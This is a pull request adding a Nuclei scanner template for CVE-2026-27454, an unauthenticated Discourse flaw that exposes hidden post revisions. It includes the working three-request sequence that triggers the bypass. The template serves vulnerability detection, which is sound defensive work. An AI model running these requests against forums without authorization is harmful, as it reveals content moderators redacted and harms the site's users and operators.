### PR TITLE
Add CVE-2026-27454 template

### DIFF
--- a/http/cves/2026/CVE-2026-27454.yaml
+++ b/http/cves/2026/CVE-2026-27454.yaml
@@ -1,0 +1,83 @@
+id: CVE-2026-27454
+
+info:
+  name: Discourse - Hidden Post Revision Disclosure via revert_to Authorization Bypass
+  author: str4k3r
+  severity: medium
+  description: |
+    PostsController#display_post calls post.revert_to(params[:version]) directly
+    whenever a version query parameter is present, without checking whether the
+    corresponding PostRevision is hidden or whether the caller has permission to
+    view edit history. Discourse's own PostSerializer already reveals, to any
+    caller, the highest post version a non-staff user is authorized to see (it
+    serializes public_version instead of the true version for non-staff scopes).
+    Re-requesting the same post at exactly that publicly-known version number
+    via GET /posts/:id.json?version=<public_version> forces revert_to to apply
+    the next PostRevision's stored modifications unconditionally. If staff have
+    hidden that specific revision (a routine moderation action to redact
+    sensitive or policy-violating content from the edit history), its pre-edit
+    raw/cooked content is returned to a completely unauthenticated caller. On a
+    patched install the same request is rejected with 403 because
+    guardian.ensure_can_see!(post_revision) is evaluated first; when no revision
+    has been hidden beyond what is already public, revert_to is a no-op on both
+    patched and vulnerable installs (the requested version is not lower than the
+    true version), so the check only fires against genuinely hidden content and
+    does not flag ordinary public edit history.
+  impact: |
+    An unauthenticated visitor can retrieve the contents of a hidden post
+    revision that moderators intended to conceal from public viewers.
+  remediation: Upgrade Discourse to 2026.1.2, 2026.2.1, 2026.3.0-latest.1, or later.
+  reference:
+    - https://github.com/discourse/discourse/security/advisories/GHSA-fq69-f929-wp96
+    - https://github.com/discourse/discourse/commit/8510fde30eb0d7f2dee822a95f6cf43b9ac943d0
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-27454
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-27454
+    cwe-id: CWE-862
+  metadata:
+    verified: true
+    max-request: 3
+    vendor: discourse
+    product: discourse
+  tags: cve,cve2026,discourse,idor,exposure,unauth
+
+http:
+  - raw:
+      - |
+        GET /posts.json HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /posts/{{post_id}}.json HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /posts/{{post_id}}.json?version={{pub_version}} HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: post_id
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '"latest_posts":\[\{"id":(\d+)'
+
+      - type: regex
+        name: pub_version
+        internal: true
+        part: body
+        group: 1
+        regex:
+          - '"version":(\d+)'
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_3 == 200"
+          - "body_2 != body_3"
+          - "!contains(body_3, 'invalid_access')"
+        condition: and


### PR DESCRIPTION
## Summary

Adds a detector for CVE-2026-27454, an unauthenticated hidden post-revision
disclosure in Discourse.

## Detection

The template first discovers a public post and the highest revision visible to
an anonymous caller, then requests that same post at the public revision
number. On vulnerable versions, `PostsController#display_post` applies the
next hidden revision without checking its visibility and returns a different
post representation. Fixed versions enforce the post-revision visibility
check, so the crafted request is rejected or remains unchanged.

All requests are unauthenticated GETs. The detector does not create, edit,
revert, or delete posts; targets with no hidden revision correctly produce no
finding.

## Validation

- Vulnerable official Discourse `2026.1.1`: `DETECTED` 3/3
- Fixed official Discourse `2026.1.4`: `NOT_DETECTED` 3/3
- Native Nuclei v3.11.0 template validation: passed
- V/F validation used disposable post/revision state solely to exercise the
  authorization boundary

## References

- https://github.com/discourse/discourse/security/advisories/GHSA-fq69-f929-wp96
- https://github.com/discourse/discourse/commit/8510fde30eb0d7f2dee822a95f6cf43b9ac943d0
- https://nvd.nist.gov/vuln/detail/CVE-2026-27454